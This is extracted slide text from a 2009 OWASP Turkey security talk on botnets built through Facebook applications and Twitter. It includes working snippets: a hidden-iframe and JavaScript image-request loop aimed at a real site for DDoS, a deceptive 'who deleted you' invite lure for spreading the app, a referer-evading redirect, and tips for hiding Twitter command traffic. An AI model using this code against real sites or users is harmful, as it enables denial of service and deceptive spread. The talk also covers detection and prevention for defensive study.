Facebook, Twitter and Botnets OWASP Turkey Chapter September 26 2009 Istanbul
Botnet • Collection of software robots, or bots, that run autonomously and automatically • Botnet in its simplest form is an army of compromised computers that take orders from a botherder • Botnets are arguably the biggest threat the Internet community has faced • Most popular Botnet Type: “IRC Channels based Botnets” • Lately Social Networking Sites based Botnets
Puppetnet • Puppetnets rely on websites that coerce web browsers to participate in Malicious activities • Such activities include – distributed denial-of-service – worm propagation – reconnaissance probing • Puppetnets exploit the high degree of flexibility granted to the mechanisms comprising the web architecture • A website under the control of an attacker can thereby transform a collection of web browsers into a distributed system that is effectively controlled by the attacker • Puppetnets can instruct any web browser to engage in malicious activities
Puppetnet • Participation in puppetnets is dynamic • Users join and participate unknowingly while surfing the net • Easy to maintain a reasonable population, without the burden of having to look for new victims • Harder for the defenders to track and filter out attacks, as puppets are likely to be relatively short-lived • Only indirectly misuse browsers to attack third parties • http: //www. ics. forth. gr/dcs/Activities/papers/TISSEC. p uppetnets. 2007. pdf
Puppetnet Diagram Zararli Web Sunucusu Atak komutlarini da iceren HTTP istek ve cevaplari Atak Trafigi Kurban Site Web Istemcileri
What can be done via Puppetnets • • Image Reference Loading image objects through Javascript Open up pop-up Windows Creation of Frames to load remote objects * No browser that imposes restrictions on the location or type of the target referenced through these mechanisms
Puppetnet DDo. S Firepower of DDo. S Attack = Number of users concurrently viewing the malicious page on their web browser * Amount of bandwidth each of these users can generate towards the target server • What is more important? – Size of Puppetnet ? – Sufficient Firepower for a typical DDo. S scenario? • Determine how much “traffic” a browser can typically generate under the attacker’s command
Facebook • Facebook is a global social networking website that is operated and privately owned by Facebook, Inc. • Users can – add friends – send them messages – update their personal profiles to notify friends about themselves – join networks organized by city, workplace, school, and region
Application Development in Facebook • Options while creating Face. Book applications • Option 1: Port an existing application to Face. Book by using iframe • Option 2: Develop an application by using FBML, FBJS, FQL and FB API • Create an application in Face. Book • • Face. Book API Facebook Markup Language(FBML) Facebook Query Language(FQL) Facebook Javascript(FBJS)
Facebook Application (How does it work? ) – Callback metaphor to interact with applications – The URL of the application associated with a registered application in Facebook – When the Facebook application URL requested, Facebook redirects the request to the server – The application processes the request, communicates with Facebook using the Facebook Application Programming Interface (API) or Facebook Query Language (FQL) – Returns Facebook Markup Language (FBML) to Facebook for presentation
Facebook Dynamics • Face. Book API – Web services programming interface for accessing core services • • • profile friends group event photo – Performs other Facebook-centric functionality • log in • redirect • update view • Facebook Markup Language (FBML) – HTML-like language – Display pages inside of the Facebook canvas
Facebook Dynamics • Facebook Query Language (FQL) – SQL-based interface into Facebook data. – Similar to standard SQL – Access many Facebook database tables • • • user friend group_member event_member photo album photo_tag – Restrictions • SELECT statements must be performed one table at a time • Join queries are not permitted • Queries must be indexable.
Facebook Dynamics • Facebook Javascript (FBJS) – – Allows limited scripting functionality Alternative DOM implementation Similar to Standard Java. Script Differs from standard Java. Script • While accessing a Java. Script property (such as document. href), FBJS uses a pair of get and set methods instead (get. Href, set. Href) • While processing scripting code inside of script elements, tacks on the application ID to function and variable names • Prevents the ability to run any javascript code you want • FBJS transformed on the fly into Java. Script as the page is loaded • All variables and functions are prepended with a string like "xyz 3455679_“ • Restriction on what can be done with DOM elements • Avoids cross-site-scripting attacks and hostile user behavior
Facebook Platform • Standards-based programming framework – Enables developers to create applications that interact and integrate with core Facebook services – Facebook applications are not installed directly onto the Facebook server. Instead, they are placed on the developer’s server – Facebook applications are called by Facebook when the application URL is requested
Facebook Application Diagram (How does it work? ) 1. Facebook Sunucusu uygulama icin bir URL istegi aliyor (apps. facebook. com/uygulama) 4. Facebook FBML cevabini aliyor ve cevabi Facebook Canvas icerisinde gosteriyor ve HTML yi istegi baslatan tarayiciya gonderiyor. 2. Facebook Uygulamanin oldugu Sunucudaki Callback URL yi cagiriyor 3. Uygulama istegi degerlendiriyor, Facebook bilgisini API ya da FQL vasitasi ile Facebook’dan aliyor ve FBML araciligi ile kullanicinin gormesi icin FBML araciligi ile Facebook’a geri gonderiyor.
What kind of a Facebook Application? • • A simple application? A popular application? Game or Utility? Fan based Program? Continuous Usage? A program that creates Programs? TOS?
Facebook-TOS • http: //www. facebook. com/terms. php Privacy Sharing Your Content and Information Safety Registration and Account Security Protecting Other People's Rights Mobile Payments Special Provisions Applicable to Share Links Special Provisions Applicable to Developers/Operators of Applications and Websites – About Advertisements on Facebook – Special Provisions Applicable to Advertisers – Special Provisions Applicable to Pages – – – – –
Facebook - TOS - Safety • You will not upload viruses or other malicious code. • You will not collect users' content or information, or otherwise access Facebook, using automated means (such as harvesting bots, robots, spiders, or scrapers) without our permission. • You will not use Facebook to do anything unlawful, misleading, malicious, or discriminatory. • You will not do anything that could disable, overburden, or impair the proper working of Facebook, such as a denial of service attack.
Facebook - TOS - Provisions Applicable to Developers • Special Provisions Applicable to Developers/Operators of Applications and Websites – You will only request data you need to operate your application. – You will not use, display, or share a user's data in a manner inconsistent with the user's privacy settings. – You will delete all data you received from Facebook if we disable your application or ask you to do so.
Facebook Revocation Email
Botnet Creation in Facebook • Image Reference – Inline linking • Use of a linked object (usually an image) • Using it from one site into a web page belonging to a second site • The second site is said to have an inline link to the site where the object is located • When a web site is visited – Browser first downloads the textual content in the form of an HTML document – The downloaded HTML document may call for other HTML files to be processed – It also permits absolute URLs that refer to images hosted on other servers (<img src="http: //www. example. com/picture. jpg" />) – When a browser downloads an HTML page containing such an image, the browser will contact the remote server to request the image content
Botnet Creation in Facebook • Image Reference – A single line like • echo "<fb: iframeborder="0" width: 0 px height: 0 px src="http: //www. w 3 schools. com/js/venus. jpg" />"; – Good enough to create a DDOS Attack to the src Victim Site being w 3 schools. com in the above example – An iframe which downloads an image with a width and height set to 0 px – Browser fetches the page above and does not show it – Change width and height and see the picture
Botnet Creation in Facebook • How to Create a large number of requests to the target site ? – – • Embed a sequence of image references in the malicious webpage, which can be done using either a sequence of IMG SRC instructions Java. Script loop that instructs the browser to load objects from the target server Loading image objects through Javascript <SCRIPT> pic= new Image(10, 10); function DDOS() { var now = new Date(); pic. src='http: //www. w 3 schools. com/js? '+now. get. Time(); set. Timeout ( "DDOS()", 10 ); return; } </SCRIPT> <IFRAME name='parent' width="0%" src="page. htm" on. Load="DDOS()"> </IFRAME>
Propagation of Facebook Botnet • Create an Application • Make it nice and fun !(Really important) • Advertise it by using Facebook features: – News Feed – Invitation(Limit 20 a day) $invite_text = htmlentities($invite_text); echo "<fb: request-form type='Kim Silmis' content='$invite_text' action='index. php' method='POST' invite='true' >"; echo "<fb: multi-friend-selector showborder='true' max ='20' actiontext='Kim Silmiş programı ile sizi arkadaş listesinden silenleri görmek ister misiniz? ' exclude_ids='$exclude_list' >"; echo "</fb: request-form>"; – Notification $facebook->api_client->notifications_send($friends[1], 'Kim silmis kullaniyor. Siz de <a href="http: //apps. facebooks. com/kilsilmis">Kim silmis</a> kullanarak zevkle zaman geçirebilirsiniz. ');
Detection of Facebook Botnet • Victim host must filter out all incoming traffic introduced by Facebook users. – Use the referer field of the HTTP requests – Determine whether a request originates from facebook. com or not – Stop the attack traffic accordingly • Possible for a Facebook application developer to overcome this situation src=http: //attack-host/dummy-page? ref=victim-host/image 1. jpg <? php if ($_GET["ref"]) { $ref=$_GET["ref"]; } print("<meta http-equiv=’refresh’ content=’ 0; url=$ref’>"); ? >
Prevention of Facebook Botnet • Social network providers should be careful with the use of client side technologies, like Java. Script, etc. • Social network operator should provide developers with a strict API, which is capable of giving access to resources only related to the system. • Applications should run in an isolated environment imposing constraints to prevent the application from interacting with other Internet hosts • Facebook Platform cancel the use of fb: iframe tag, as this tag is used to load images hosted at the victim host.
Facebook Po. C Facebot • www. ics. forth. gr/dcs/Activities/papers/facebo t. isc 08. pdf
Twitter • Free social networking and micro-blogging service • Enables users to send and read messages known as tweets • Tweets are text-based posts of up to 140 characters displayed on the author's profile page and delivered to the author's followers • Senders can restrict delivery to those in their circle of friends or allow open access
Twitter • • • Profile(Name, Location, Bio) Find People(Twitter, Other Networks, Emails, Suggested Users) @ RT Direct Message # http: //search. twitter. com Favorites RSS
Twitter Botnet? • Reasons – Ability to hide random commands in the large amount of data that is generated each day – A really good API that would make integration easy • Ideas – Option 1: A protected twitter account that only the bots could read. • Restriction on who could see the commands ? • Easy for Twitter to block the user • Po. C supposedly exists – Option 2: Send Commands to random accounts and then have the Bot use the search feature to find the commands. – – – • Harder for Twitter to block the messages as the commands could be posted from any account to any other account. Bot would have to have a way to spot the commands in the general mess of other tweets out there. If the bot can spot the commands then Twitter could also do the same matching and automatically drop those tweets. Use seemingly innocent commands, such as "check out this link. . . " instead of saying download a file Innocent commands would be hard for Twitter to block without upsetting legitimate users Additional Suggestions – Using Tiny. URL to obfuscate commands – Using hash tags to represent certain things – Making bots to follow certain accounts to mark themselves as bots.
Twitter - POC • Proof of Concept bot which uses Twitter as its Command Control channel at http: //www. digininja. org/projects/kreiosc 2. php • Waiting for Defcon 2009 Video Presented by Kevin Johnson and Tom Eston
Tesekkurler • Ibrahim Halil Saruhan Facebook : halilsaru@gmail. com E-Mail : ibrahimsaruhan@gmail. com
Sorular ?
Скачать презентацию Facebook Twitter and Botnets OWASP Turkey Chapter September
e0b09457eb0f4b603e1030fdb61e8059.ppt